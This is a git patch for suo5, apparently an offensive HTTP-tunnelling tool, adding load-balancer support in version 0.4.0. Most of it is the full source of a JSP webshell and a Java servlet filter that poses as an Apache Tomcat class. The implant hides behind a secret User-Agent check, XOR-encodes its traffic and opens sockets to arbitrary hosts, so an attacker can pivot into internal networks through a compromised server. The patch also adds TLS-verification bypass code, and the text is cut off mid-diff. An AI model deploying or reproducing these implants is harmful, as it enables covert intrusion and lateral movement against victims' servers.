From 9a3f2935f005d18a36c3387372f5f66f1231a05a Mon Sep 17 00:00:00 2001 From: zema1 Date: Sun, 5 Mar 2023 21:51:21 +0800 Subject: [PATCH] feat: support load balancing case --- CHANGELOG.md | 12 + README.md | 39 +- assets/0.3.0/Suo5Filter.java | 385 ++++++++++++++++++ assets/0.3.0/suo5.jsp | 376 +++++++++++++++++ assets/Suo5Filter.java | 190 +++++++-- assets/suo5.jsp | 181 ++++++-- ctrl/chunked.go | 21 +- ctrl/config.go | 37 +- ctrl/ctrl.go | 32 +- ctrl/handler.go | 37 +- gui/frontend/src/Home.vue | 47 ++- gui/frontend/wailsjs/go/models.ts | 6 +- gui/wails.json | 2 +- main.go | 23 +- suo5.iml | 4 +- .../nginx-tomcat-load-balance/code/index.html | 1 + tests/nginx-tomcat-load-balance/default.conf | 38 ++ .../docker-compose.yml | 32 ++ tests/nginx-tomcat-load-balance/server.xml | 143 +++++++ tests/nginx-tomcat/docker-compose.yml | 2 - 20 files changed, 1434 insertions(+), 174 deletions(-) create mode 100644 assets/0.3.0/Suo5Filter.java create mode 100644 assets/0.3.0/suo5.jsp create mode 100644 tests/nginx-tomcat-load-balance/code/index.html create mode 100644 tests/nginx-tomcat-load-balance/default.conf create mode 100644 tests/nginx-tomcat-load-balance/docker-compose.yml create mode 100644 tests/nginx-tomcat-load-balance/server.xml diff --git a/CHANGELOG.md b/CHANGELOG.md index 6b1ba17..48e0a6e 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,5 +1,17 @@ # 更新记录 +## [0.4.0] - 2023-03-05 + +### 新增 + +- 支持在负载均衡场景使用,需要通过 `-r` 指定一个 url,流量将集中到这个 url +- 支持自定义 header,而不仅仅是自定义 User-Agent [#5](https://github.com/zema1/suo5/issues/6) +- 优化连接控制,本地连接关闭后能更快的释放底层连接 + +### 修复 + +- 修复命令行版设置认证信息不生效的问题 [#5](https://github.com/zema1/suo5/issues/8) + ## [0.3.0] - 2023-02-24 ### 新增 diff --git a/README.md b/README.md index be6a3b8..037c23b 100644 --- a/README.md +++ b/README.md @@ -57,25 +57,27 @@ USAGE: suo5 [global options] command [command options] [arguments...] VERSION: - v0.3.0 + v0.4.0 COMMANDS: help, h Shows a list of commands or help for one command GLOBAL OPTIONS: - --target value, -t value set the remote server url, ex: http://localhost:8080/tomcat_debug_war_exploded/ - --listen value, -l value set the listen address of socks5 server (default: "127.0.0.1:1111") - --method value, -m value http request method (default: "POST") - --no-auth disable socks5 authentication (default: true) - --auth value socks5 creds, username:password, leave empty to auto generate - --mode value connection mode, choices are auto, full, half (default: "auto") - --ua value the user-agent used to send request (default: "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.1.2.3") - --timeout value http request timeout in seconds (default: 10) - --buf-size value set the request max body size (default: 327680) - --proxy value use upstream socks5 proxy - --debug, -d debug the traffic, print more details (default: false) - --help, -h show help - --version, -v print the version + --target value, -t value set the remote server url, ex: http://localhost:8080/tomcat_debug_war_exploded/ + --listen value, -l value set the listen address of socks5 server (default: "127.0.0.1:1111") + --method value, -m value http request method (default: "POST") + --redirect value, -r value redirect to the url if host not matched, used to bypass load balance + --no-auth disable socks5 authentication (default: true) + --auth value socks5 creds, username:password, leave empty to auto generate + --mode value connection mode, choices are auto, full, half (default: "auto") + --ua value the user-agent used to send request (default: "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.1.2.3") + --header value, -H value [ --header value, -H value ] use extra header, ex -H 'Cookie: abc' + --timeout value http request timeout in seconds (default: 10) + --buf-size value set the request max body size (default: 327680) + --proxy value use upstream socks5 proxy + --debug, -d debug the traffic, print more details (default: false) + --help, -h show help + --version, -v print the version ``` 命令行版本与界面版配置完全一致,可以对照界面版功能来使用,最简单的只需指定连接目标 @@ -94,6 +96,13 @@ $ ./suo5 -m GET -t https://example.com/proxy.jsp ```bash $ ./suo5 -t https://example.com/proxy.jsp -l 0.0.0.0:7788 --auth test:test123 ``` + +负载均衡场景下将流量转发到某一个固定的 url 解决请求被分散的问题 (需要尽可能的在每一个后端服务中上传 suo5) + +```bash +$ ./suo5 -t https://example.com/proxy.jsp -t http://172.0.3.2/code/proxy.jsp +``` + ### 特别提醒 `User-Agent` (`ua`) 的配置本地端与服务端是绑定的,如果修改了其中一个,另一个也必须对应修改才能连接上。 @@ -113,7 +122,7 @@ $ ./suo5 -t https://example.com/proxy.jsp -l 0.0.0.0:7788 --auth test:test123 ## 接下来 - [x] 支持配置上游 socks 代理 -- [ ] 支持负载均衡的场景 +- [x] 支持负载均衡的场景 - [ ] 支持 .Net 的类型 ## 参考 diff --git a/assets/0.3.0/Suo5Filter.java b/assets/0.3.0/Suo5Filter.java new file mode 100644 index 0000000..7ea20af --- /dev/null +++ b/assets/0.3.0/Suo5Filter.java @@ -0,0 +1,385 @@ +package org.apache.catalina.filters; + + +import javax.servlet.*; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import java.io.*; +import java.net.InetSocketAddress; +import java.net.Socket; +import java.nio.ByteBuffer; +import java.util.Arrays; +import java.util.Date; +import java.util.HashMap; + +public class Suo5Filter implements Filter, Runnable { + + InputStream gInStream; + OutputStream gOutStream; + + public void init(FilterConfig filterConfig) throws ServletException { + } + + public void destroy() { + } + + private void setStream(InputStream in, OutputStream out) { + gInStream = in; + gOutStream = out; + } + + public void doFilter(ServletRequest sReq, ServletResponse sResp, FilterChain chain) throws IOException, ServletException { + HttpServletRequest request = (HttpServletRequest) sReq; + HttpServletResponse response = (HttpServletResponse) sResp; + String agent = request.getHeader("User-Agent"); + String contentType = request.getHeader("Content-Type"); + + if (agent == null || !agent.equals("Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.1.2.3")) { + if (chain != null) { + chain.doFilter(sReq, sResp); + } + return; + } + if (contentType == null) { + return; + } + + try { + if (contentType.equals("application/plain")) { + tryFullDuplex(request, response); + return; + } + + if (contentType.equals("application/octet-stream")) { + processDataBio(request, response); + } else { + processDataUnary(request, response); + } + } catch (Throwable e) { +// System.out.printf("process data error %s", e); +// e.printStackTrace(); + } + } + + public void readInputStreamWithTimeout(InputStream is, byte[] b, int timeoutMillis) throws IOException, InterruptedException { + int bufferOffset = 0; + long maxTimeMillis = new Date().getTime() + timeoutMillis; + while (new Date().getTime() < maxTimeMillis && bufferOffset < b.length) { + int readLength = b.length - bufferOffset; + if (is.available() < readLength) { + readLength = is.available(); + } + // can alternatively use bufferedReader, guarded by isReady(): + int readResult = is.read(b, bufferOffset, readLength); + if (readResult == -1) break; + bufferOffset += readResult; + Thread.sleep(200); + } + } + + public void tryFullDuplex(HttpServletRequest request, HttpServletResponse response) throws IOException, InterruptedException { + InputStream in = request.getInputStream(); + byte[] data = new byte[32]; + readInputStreamWithTimeout(in, data, 2000); + OutputStream out = response.getOutputStream(); + out.write(data); + } + + + private HashMap newCreate(byte s) { + HashMap m = new HashMap(); + m.put("ac", new byte[]{0x04}); + m.put("s", new byte[]{s}); + return m; + } + + private HashMap newData(byte[] data) { + HashMap m = new HashMap(); + m.put("ac", new byte[]{0x01}); + m.put("dt", data); + return m; + } + + private HashMap newDel() { + HashMap m = new HashMap(); + m.put("ac", new byte[]{0x02}); + return m; + } + + private HashMap newStatus(byte b) { + HashMap m = new HashMap(); + m.put("s", new byte[]{b}); + return m; + } + + byte[] u32toBytes(int i) { + byte[] result = new byte[4]; + result[0] = (byte) (i >> 24); + result[1] = (byte) (i >> 16); + result[2] = (byte) (i >> 8); + result[3] = (byte) (i /*>> 0*/); + return result; + } + + int bytesToU32(byte[] bytes) { + return ((bytes[0] & 0xFF) << 24) | + ((bytes[1] & 0xFF) << 16) | + ((bytes[2] & 0xFF) << 8) | + ((bytes[3] & 0xFF) << 0); + } + + + private byte[] marshal(HashMap m) throws IOException { + ByteArrayOutputStream buf = new ByteArrayOutputStream(); + for (String key : m.keySet()) { + byte[] value = m.get(key); + buf.write((byte) key.length()); + buf.write(key.getBytes()); + buf.write(u32toBytes(value.length)); + buf.write(value); + } + + byte[] data = buf.toByteArray(); + ByteBuffer dbuf = ByteBuffer.allocate(5 + data.length); + dbuf.putInt(data.length); + // xor key + byte key = data[data.length / 2]; + dbuf.put(key); + for (int i = 0; i < data.length; i++) { + data[i] = (byte) (data[i] ^ key); + } + dbuf.put(data); + return dbuf.array(); + } + + private HashMap unmarshal(InputStream in) throws Exception { + DataInputStream reader = new DataInputStream(in); + byte[] header = new byte[4 + 1]; // size and datatype + reader.readFully(header); + // read full + ByteBuffer bb = ByteBuffer.wrap(header); + int len = bb.getInt(); + int x = bb.get(); + if (len > 1024 * 1024 * 32) { + throw new IOException("invalid len"); + } + byte[] bs = new byte[len]; + reader.readFully(bs); + for (int i = 0; i < bs.length; i++) { + bs[i] = (byte) (bs[i] ^ x); + } + HashMap m = new HashMap(); + byte[] buf; + for (int i = 0; i < bs.length - 1; ) { + short kLen = bs[i]; + i += 1; + if (i + kLen >= bs.length) { + throw new Exception("key len error"); + } + if (kLen < 0) { + throw new Exception("key len error"); + } + buf = Arrays.copyOfRange(bs, i, i+kLen); + String key = new String(buf); + i += kLen; + + if (i + 4 >= bs.length) { + throw new Exception("value len error"); + } + buf = Arrays.copyOfRange(bs, i, i+4); + int vLen = bytesToU32(buf); + i += 4; + if (vLen < 0) { + throw new Exception("value error"); + } + + if (i + vLen > bs.length) { + throw new Exception("value error"); + } + byte[] value = Arrays.copyOfRange(bs, i, i+vLen); + i += vLen; + + m.put(key, value); + } + return m; + } + + private void processDataBio(HttpServletRequest request, HttpServletResponse resp) throws Exception { + final InputStream reqInputStream = request.getInputStream(); + final BufferedInputStream reqReader = new BufferedInputStream(reqInputStream); + HashMap dataMap; + dataMap = unmarshal(reqReader); + + byte[] action = dataMap.get("ac"); + if (action.length != 1 || action[0] != 0x00) { + resp.setStatus(403); + return; + } + resp.setBufferSize(8 * 1024); + final OutputStream respOutStream = resp.getOutputStream(); + + // 0x00 create socket + resp.setHeader("X-Accel-Buffering", "no"); + String host = new String(dataMap.get("h")); + int port = Integer.parseInt(new String(dataMap.get("p"))); + Socket sc; + try { + sc = new Socket(); + sc.connect(new InetSocketAddress(host, port), 5000); + } catch (Exception e) { + respOutStream.write(marshal(newStatus((byte) 0x01))); + respOutStream.flush(); + respOutStream.close(); + return; + } + + respOutStream.write(marshal(newStatus((byte) 0x00))); + respOutStream.flush(); + + final OutputStream scOutStream = sc.getOutputStream(); + final InputStream scInStream = sc.getInputStream(); + + Thread t = null; + try { + Suo5Filter p = new Suo5Filter(); + p.setStream(scInStream, respOutStream); + t = new Thread(p); + t.start(); + readReq(reqReader, scOutStream); + } catch (Exception e) { +// System.out.printf("pipe error, %s\n", e); + } finally { + sc.close(); + respOutStream.close(); + if (t != null) { + t.join(); + } + } + } + + private void readSocket(InputStream inputStream, OutputStream outputStream) throws IOException { + byte[] readBuf = new byte[1024 * 8]; + + while (true) { + int n = inputStream.read(readBuf); + if (n <= 0) { + break; + } + byte[] dataTmp = Arrays.copyOfRange(readBuf, 0, 0+n); + byte[] finalData = marshal(newData(dataTmp)); + outputStream.write(finalData); + outputStream.flush(); + } + } + + private void readReq(BufferedInputStream bufInputStream, OutputStream socketOutStream) throws Exception { + while (true) { + HashMap dataMap; + dataMap = unmarshal(bufInputStream); + + byte[] action = dataMap.get("ac"); + if (action.length != 1) { + return; + } + if (action[0] == 0x02) { + socketOutStream.close(); + return; + } else if (action[0] == 0x01) { + byte[] data = dataMap.get("dt"); + if (data.length != 0) { + socketOutStream.write(data); + socketOutStream.flush(); + } + } else { + return; + } + } + } + + private void processDataUnary(HttpServletRequest request, HttpServletResponse resp) throws + Exception { + InputStream is = request.getInputStream(); + ServletContext ctx = request.getSession().getServletContext(); + BufferedInputStream reader = new BufferedInputStream(is); + HashMap dataMap; + dataMap = unmarshal(reader); + + String clientId = new String(dataMap.get("id")); + byte[] action = dataMap.get("ac"); + if (action.length != 1) { + resp.setStatus(403); + return; + } + /* + ActionCreate byte = 0x00 + ActionData byte = 0x01 + ActionDelete byte = 0x02 + ActionResp byte = 0x03 + */ + resp.setBufferSize(8 * 1024); + OutputStream respOutStream = resp.getOutputStream(); + if (action[0] == 0x02) { + OutputStream scOutStream = (OutputStream) ctx.getAttribute(clientId); + if (scOutStream != null) { + scOutStream.close(); + } + return; + } else if (action[0] == 0x01) { + OutputStream scOutStream = (OutputStream) ctx.getAttribute(clientId); + if (scOutStream == null) { + respOutStream.write(marshal(newDel())); + respOutStream.flush(); + respOutStream.close(); + return; + } + byte[] data = dataMap.get("dt"); + if (data.length != 0) { + scOutStream.write(data); + scOutStream.flush(); + } + respOutStream.close(); + return; + } + + resp.setHeader("X-Accel-Buffering", "no"); + String host = new String(dataMap.get("h")); + int port = Integer.parseInt(new String(dataMap.get("p"))); + Socket sc; + try { + sc = new Socket(); + sc.connect(new InetSocketAddress(host, port), 5000); + } catch (Exception e) { + respOutStream.write(marshal(newStatus((byte) 0x01))); + respOutStream.flush(); + respOutStream.close(); + return; + } + + OutputStream scOutStream = sc.getOutputStream(); + ctx.setAttribute(clientId, scOutStream); + respOutStream.write(marshal(newStatus((byte) 0x00))); + respOutStream.flush(); + + InputStream scInStream = sc.getInputStream(); + + try { + readSocket(scInStream, respOutStream); + } catch (Exception e) { +// System.out.printf("pipe error, %s", e); +// e.printStackTrace(); + } finally { + sc.close(); + respOutStream.close(); + ctx.removeAttribute(clientId); + } + } + + public void run() { + try { + readSocket(gInStream, gOutStream); + } catch (Exception e) { +// System.out.printf("read socket error, %s", e); +// e.printStackTrace(); + } + } +} \ No newline at end of file diff --git a/assets/0.3.0/suo5.jsp b/assets/0.3.0/suo5.jsp new file mode 100644 index 0000000..92ec2e3 --- /dev/null +++ b/assets/0.3.0/suo5.jsp @@ -0,0 +1,376 @@ +<%@ page trimDirectiveWhitespaces="true" %> +<%@ page import="java.util.HashMap" %> +<%@ page import="java.nio.ByteBuffer" %> +<%@ page import="java.io.*" %> +<%@ page import="java.net.Socket" %> +<%@ page import="java.net.InetSocketAddress" %> +<%@ page import="java.util.Date" %> +<%@ page import="java.util.Arrays" %> +<%! + public class Suo5 implements Runnable { + + InputStream gInStream; + OutputStream gOutStream; + + private void setStream(InputStream in, OutputStream out) { + gInStream = in; + gOutStream = out; + } + + public void process(ServletRequest sReq, ServletResponse sResp) { + HttpServletRequest request = (HttpServletRequest) sReq; + HttpServletResponse response = (HttpServletResponse) sResp; + String agent = request.getHeader("User-Agent"); + String contentType = request.getHeader("Content-Type"); + + if (agent == null || !agent.equals("Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.1.2.3")) { + return; + } + if (contentType == null) { + return; + } + + try { + if (contentType.equals("application/plain")) { + tryFullDuplex(request, response); + return; + } + + if (contentType.equals("application/octet-stream")) { + processDataBio(request, response); + } else { + processDataUnary(request, response); + } + } catch (Throwable e) { +// System.out.printf("process data error %s", e); +// e.printStackTrace(); + } + } + + public void readInputStreamWithTimeout(InputStream is, byte[] b, int timeoutMillis) throws IOException, InterruptedException { + int bufferOffset = 0; + long maxTimeMillis = new Date().getTime() + timeoutMillis; + while (new Date().getTime() < maxTimeMillis && bufferOffset < b.length) { + int readLength = b.length - bufferOffset; + if (is.available() < readLength) { + readLength = is.available(); + } + // can alternatively use bufferedReader, guarded by isReady(): + int readResult = is.read(b, bufferOffset, readLength); + if (readResult == -1) break; + bufferOffset += readResult; + Thread.sleep(200); + } + } + + public void tryFullDuplex(HttpServletRequest request, HttpServletResponse response) throws IOException, InterruptedException { + InputStream in = request.getInputStream(); + byte[] data = new byte[32]; + readInputStreamWithTimeout(in, data, 2000); + OutputStream out = response.getOutputStream(); + out.write(data); + } + + + private HashMap newCreate(byte s) { + HashMap m = new HashMap(); + m.put("ac", new byte[]{0x04}); + m.put("s", new byte[]{s}); + return m; + } + + private HashMap newData(byte[] data) { + HashMap m = new HashMap(); + m.put("ac", new byte[]{0x01}); + m.put("dt", data); + return m; + } + + private HashMap newDel() { + HashMap m = new HashMap(); + m.put("ac", new byte[]{0x02}); + return m; + } + + private HashMap newStatus(byte b) { + HashMap m = new HashMap(); + m.put("s", new byte[]{b}); + return m; + } + + byte[] u32toBytes(int i) { + byte[] result = new byte[4]; + result[0] = (byte) (i >> 24); + result[1] = (byte) (i >> 16); + result[2] = (byte) (i >> 8); + result[3] = (byte) (i /*>> 0*/); + return result; + } + + int bytesToU32(byte[] bytes) { + return ((bytes[0] & 0xFF) << 24) | + ((bytes[1] & 0xFF) << 16) | + ((bytes[2] & 0xFF) << 8) | + ((bytes[3] & 0xFF) << 0); + } + + + private byte[] marshal(HashMap m) throws IOException { + ByteArrayOutputStream buf = new ByteArrayOutputStream(); + for (String key : m.keySet()) { + byte[] value = m.get(key); + buf.write((byte) key.length()); + buf.write(key.getBytes()); + buf.write(u32toBytes(value.length)); + buf.write(value); + } + + byte[] data = buf.toByteArray(); + ByteBuffer dbuf = ByteBuffer.allocate(5 + data.length); + dbuf.putInt(data.length); + // xor key + byte key = data[data.length / 2]; + dbuf.put(key); + for (int i = 0; i < data.length; i++) { + data[i] = (byte) (data[i] ^ key); + } + dbuf.put(data); + return dbuf.array(); + } + + private HashMap unmarshal(InputStream in) throws Exception { + DataInputStream reader = new DataInputStream(in); + byte[] header = new byte[4 + 1]; // size and datatype + reader.readFully(header); + // read full + ByteBuffer bb = ByteBuffer.wrap(header); + int len = bb.getInt(); + int x = bb.get(); + if (len > 1024 * 1024 * 32) { + throw new IOException("invalid len"); + } + byte[] bs = new byte[len]; + reader.readFully(bs); + for (int i = 0; i < bs.length; i++) { + bs[i] = (byte) (bs[i] ^ x); + } + HashMap m = new HashMap(); + byte[] buf; + for (int i = 0; i < bs.length - 1; ) { + short kLen = bs[i]; + i += 1; + if (i + kLen >= bs.length) { + throw new Exception("key len error"); + } + if (kLen < 0) { + throw new Exception("key len error"); + } + buf = Arrays.copyOfRange(bs, i, i+kLen); + String key = new String(buf); + i += kLen; + + if (i + 4 >= bs.length) { + throw new Exception("value len error"); + } + buf = Arrays.copyOfRange(bs, i, i+4); + int vLen = bytesToU32(buf); + i += 4; + if (vLen < 0) { + throw new Exception("value error"); + } + + if (i + vLen > bs.length) { + throw new Exception("value error"); + } + byte[] value = Arrays.copyOfRange(bs, i, i+vLen); + i += vLen; + + m.put(key, value); + } + return m; + } + + private void processDataBio(HttpServletRequest request, HttpServletResponse resp) throws Exception { + final InputStream reqInputStream = request.getInputStream(); + final BufferedInputStream reqReader = new BufferedInputStream(reqInputStream); + HashMap dataMap; + dataMap = unmarshal(reqReader); + + byte[] action = dataMap.get("ac"); + if (action.length != 1 || action[0] != 0x00) { + resp.setStatus(403); + return; + } + resp.setBufferSize(8 * 1024); + final OutputStream respOutStream = resp.getOutputStream(); + + // 0x00 create socket + resp.setHeader("X-Accel-Buffering", "no"); + String host = new String(dataMap.get("h")); + int port = Integer.parseInt(new String(dataMap.get("p"))); + Socket sc; + try { + sc = new Socket(); + sc.connect(new InetSocketAddress(host, port), 5000); + } catch (Exception e) { + respOutStream.write(marshal(newStatus((byte) 0x01))); + respOutStream.flush(); + respOutStream.close(); + return; + } + + respOutStream.write(marshal(newStatus((byte) 0x00))); + respOutStream.flush(); + + final OutputStream scOutStream = sc.getOutputStream(); + final InputStream scInStream = sc.getInputStream(); + + Thread t = null; + try { + Suo5 p = new Suo5(); + p.setStream(scInStream, respOutStream); + t = new Thread(p); + t.start(); + readReq(reqReader, scOutStream); + } catch (Exception e) { +// System.out.printf("pipe error, %s\n", e); + } finally { + sc.close(); + respOutStream.close(); + if (t != null) { + t.join(); + } + } + } + + private void readSocket(InputStream inputStream, OutputStream outputStream) throws IOException { + byte[] readBuf = new byte[1024 * 8]; + + while (true) { + int n = inputStream.read(readBuf); + if (n <= 0) { + break; + } + byte[] dataTmp = Arrays.copyOfRange(readBuf, 0, 0+n); + byte[] finalData = marshal(newData(dataTmp)); + outputStream.write(finalData); + outputStream.flush(); + } + } + + private void readReq(BufferedInputStream bufInputStream, OutputStream socketOutStream) throws Exception { + while (true) { + HashMap dataMap; + dataMap = unmarshal(bufInputStream); + + byte[] action = dataMap.get("ac"); + if (action.length != 1) { + return; + } + if (action[0] == 0x02) { + socketOutStream.close(); + return; + } else if (action[0] == 0x01) { + byte[] data = dataMap.get("dt"); + if (data.length != 0) { + socketOutStream.write(data); + socketOutStream.flush(); + } + } else { + return; + } + } + } + + private void processDataUnary(HttpServletRequest request, HttpServletResponse resp) throws + Exception { + InputStream is = request.getInputStream(); + ServletContext ctx = request.getSession().getServletContext(); + BufferedInputStream reader = new BufferedInputStream(is); + HashMap dataMap; + dataMap = unmarshal(reader); + + String clientId = new String(dataMap.get("id")); + byte[] action = dataMap.get("ac"); + if (action.length != 1) { + resp.setStatus(403); + return; + } + /* + ActionCreate byte = 0x00 + ActionData byte = 0x01 + ActionDelete byte = 0x02 + ActionResp byte = 0x03 + */ + resp.setBufferSize(8 * 1024); + OutputStream respOutStream = resp.getOutputStream(); + if (action[0] == 0x02) { + OutputStream scOutStream = (OutputStream) ctx.getAttribute(clientId); + if (scOutStream != null) { + scOutStream.close(); + } + return; + } else if (action[0] == 0x01) { + OutputStream scOutStream = (OutputStream) ctx.getAttribute(clientId); + if (scOutStream == null) { + respOutStream.write(marshal(newDel())); + respOutStream.flush(); + respOutStream.close(); + return; + } + byte[] data = dataMap.get("dt"); + if (data.length != 0) { + scOutStream.write(data); + scOutStream.flush(); + } + respOutStream.close(); + return; + } + + resp.setHeader("X-Accel-Buffering", "no"); + String host = new String(dataMap.get("h")); + int port = Integer.parseInt(new String(dataMap.get("p"))); + Socket sc; + try { + sc = new Socket(); + sc.connect(new InetSocketAddress(host, port), 5000); + } catch (Exception e) { + respOutStream.write(marshal(newStatus((byte) 0x01))); + respOutStream.flush(); + respOutStream.close(); + return; + } + + OutputStream scOutStream = sc.getOutputStream(); + ctx.setAttribute(clientId, scOutStream); + respOutStream.write(marshal(newStatus((byte) 0x00))); + respOutStream.flush(); + + InputStream scInStream = sc.getInputStream(); + + try { + readSocket(scInStream, respOutStream); + } catch (Exception e) { +// System.out.printf("pipe error, %s", e); +// e.printStackTrace(); + } finally { + sc.close(); + respOutStream.close(); + ctx.removeAttribute(clientId); + } + } + + public void run() { + try { + readSocket(gInStream, gOutStream); + } catch (Exception e) { +// System.out.printf("read socket error, %s", e); +// e.printStackTrace(); + } + } + } +%> +<% + Suo5 o = new Suo5(); + o.process(request, response); +%> diff --git a/assets/Suo5Filter.java b/assets/Suo5Filter.java index 7ea20af..5f01a15 100644 --- a/assets/Suo5Filter.java +++ b/assets/Suo5Filter.java @@ -1,32 +1,36 @@ package org.apache.catalina.filters; +import javax.net.ssl.*; import javax.servlet.*; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.io.*; -import java.net.InetSocketAddress; -import java.net.Socket; +import java.net.*; import java.nio.ByteBuffer; +import java.security.cert.CertificateException; +import java.security.cert.X509Certificate; import java.util.Arrays; import java.util.Date; +import java.util.Enumeration; import java.util.HashMap; -public class Suo5Filter implements Filter, Runnable { +public class Suo5Filter implements Runnable, HostnameVerifier, X509TrustManager, Filter { InputStream gInStream; OutputStream gOutStream; + private void setStream(InputStream in, OutputStream out) { + gInStream = in; + gOutStream = out; + } + public void init(FilterConfig filterConfig) throws ServletException { } public void destroy() { } - private void setStream(InputStream in, OutputStream out) { - gInStream = in; - gOutStream = out; - } public void doFilter(ServletRequest sReq, ServletResponse sResp, FilterChain chain) throws IOException, ServletException { HttpServletRequest request = (HttpServletRequest) sReq; @@ -50,13 +54,13 @@ public void doFilter(ServletRequest sReq, ServletResponse sResp, FilterChain cha return; } - if (contentType.equals("application/octet-stream")) { + if (contentType.equals("application/octet-stream")) { processDataBio(request, response); } else { processDataUnary(request, response); } } catch (Throwable e) { -// System.out.printf("process data error %s", e); +// System.out.printf("process data error %s\n", e); // e.printStackTrace(); } } @@ -179,14 +183,14 @@ private HashMap unmarshal(InputStream in) throws Exception { if (kLen < 0) { throw new Exception("key len error"); } - buf = Arrays.copyOfRange(bs, i, i+kLen); + buf = Arrays.copyOfRange(bs, i, i + kLen); String key = new String(buf); i += kLen; if (i + 4 >= bs.length) { throw new Exception("value len error"); } - buf = Arrays.copyOfRange(bs, i, i+4); + buf = Arrays.copyOfRange(bs, i, i + 4); int vLen = bytesToU32(buf); i += 4; if (vLen < 0) { @@ -196,7 +200,7 @@ private HashMap unmarshal(InputStream in) throws Exception { if (i + vLen > bs.length) { throw new Exception("value error"); } - byte[] value = Arrays.copyOfRange(bs, i, i+vLen); + byte[] value = Arrays.copyOfRange(bs, i, i + vLen); i += vLen; m.put(key, value); @@ -247,7 +251,7 @@ private void processDataBio(HttpServletRequest request, HttpServletResponse resp t.start(); readReq(reqReader, scOutStream); } catch (Exception e) { -// System.out.printf("pipe error, %s\n", e); +// System.out.printf("pipe error, %s\n", e); } finally { sc.close(); respOutStream.close(); @@ -257,7 +261,7 @@ private void processDataBio(HttpServletRequest request, HttpServletResponse resp } } - private void readSocket(InputStream inputStream, OutputStream outputStream) throws IOException { + private void readSocket(InputStream inputStream, OutputStream outputStream, boolean needMarshal) throws IOException { byte[] readBuf = new byte[1024 * 8]; while (true) { @@ -265,9 +269,11 @@ private void readSocket(InputStream inputStream, OutputStream outputStream) thro if (n <= 0) { break; } - byte[] dataTmp = Arrays.copyOfRange(readBuf, 0, 0+n); - byte[] finalData = marshal(newData(dataTmp)); - outputStream.write(finalData); + byte[] dataTmp = Arrays.copyOfRange(readBuf, 0, 0 + n); + if (needMarshal) { + dataTmp = marshal(newData(dataTmp)); + } + outputStream.write(dataTmp); outputStream.flush(); } } @@ -304,18 +310,34 @@ private void processDataUnary(HttpServletRequest request, HttpServletResponse re HashMap dataMap; dataMap = unmarshal(reader); + String clientId = new String(dataMap.get("id")); byte[] action = dataMap.get("ac"); if (action.length != 1) { resp.setStatus(403); return; } - /* - ActionCreate byte = 0x00 - ActionData byte = 0x01 - ActionDelete byte = 0x02 - ActionResp byte = 0x03 - */ + /* + ActionCreate byte = 0x00 + ActionData byte = 0x01 + ActionDelete byte = 0x02 + */ + byte[] redirectData = dataMap.get("r"); + boolean needRedirect = redirectData != null && redirectData.length > 0; + String redirectUrl = ""; + if (needRedirect) { + dataMap.remove("r"); + redirectUrl = new String(redirectData); + needRedirect = !isLocalAddr(redirectUrl); + } + // load balance, send request with data to request url + // action 0x00 need to pipe, see below + if (needRedirect && (action[0] == 0x01 || action[0] == 0x02)) { + HttpURLConnection conn = redirect(request, dataMap, redirectUrl); + conn.disconnect(); + return; + } + resp.setBufferSize(8 * 1024); OutputStream respOutStream = resp.getOutputStream(); if (action[0] == 0x02) { @@ -340,35 +362,49 @@ private void processDataUnary(HttpServletRequest request, HttpServletResponse re respOutStream.close(); return; } - + // 0x00 create new tunnel resp.setHeader("X-Accel-Buffering", "no"); String host = new String(dataMap.get("h")); int port = Integer.parseInt(new String(dataMap.get("p"))); - Socket sc; - try { - sc = new Socket(); - sc.connect(new InetSocketAddress(host, port), 5000); - } catch (Exception e) { - respOutStream.write(marshal(newStatus((byte) 0x01))); - respOutStream.flush(); - respOutStream.close(); - return; - } - - OutputStream scOutStream = sc.getOutputStream(); - ctx.setAttribute(clientId, scOutStream); - respOutStream.write(marshal(newStatus((byte) 0x00))); - respOutStream.flush(); - InputStream scInStream = sc.getInputStream(); + InputStream readFrom; + Socket sc = null; + HttpURLConnection conn = null; + + if (needRedirect) { + // pipe redirect stream and current response body + conn = redirect(request, dataMap, redirectUrl); + readFrom = conn.getInputStream(); + } else { + // pipe socket stream and current response body + try { + sc = new Socket(); + sc.connect(new InetSocketAddress(host, port), 5000); + readFrom = sc.getInputStream(); + ctx.setAttribute(clientId, sc.getOutputStream()); + respOutStream.write(marshal(newStatus((byte) 0x00))); + respOutStream.flush(); + } catch (Exception e) { + ctx.removeAttribute(clientId); + respOutStream.write(marshal(newStatus((byte) 0x01))); + respOutStream.flush(); + respOutStream.close(); + return; + } + } try { - readSocket(scInStream, respOutStream); + readSocket(readFrom, respOutStream, !needRedirect); } catch (Exception e) { -// System.out.printf("pipe error, %s", e); +// System.out.printf("pipe error, %s\n", e); // e.printStackTrace(); } finally { - sc.close(); + if (sc != null) { + sc.close(); + } + if (conn != null) { + conn.disconnect(); + } respOutStream.close(); ctx.removeAttribute(clientId); } @@ -376,10 +412,74 @@ private void processDataUnary(HttpServletRequest request, HttpServletResponse re public void run() { try { - readSocket(gInStream, gOutStream); + readSocket(gInStream, gOutStream, true); } catch (Exception e) { -// System.out.printf("read socket error, %s", e); +// System.out.printf("read socket error, %s\n", e); // e.printStackTrace(); } } + + boolean isLocalAddr(String url) throws Exception { + String ip = (new URL(url)).getHost(); + Enumeration nifs = NetworkInterface.getNetworkInterfaces(); + while (nifs.hasMoreElements()) { + NetworkInterface nif = nifs.nextElement(); + Enumeration addresses = nif.getInetAddresses(); + while (addresses.hasMoreElements()) { + InetAddress addr = addresses.nextElement(); + if (addr instanceof Inet4Address) + if (addr.getHostAddress().equals(ip)) + return true; + } + } + return false; + } + + HttpURLConnection redirect(HttpServletRequest request, HashMap dataMap, String rUrl) throws Exception { + String method = request.getMethod(); + URL u = new URL(rUrl); + HttpURLConnection conn = (HttpURLConnection) u.openConnection(); + conn.setRequestMethod(method); + conn.setConnectTimeout(3000); + conn.setDoOutput(true); + conn.setDoInput(true); + + // ignore ssl 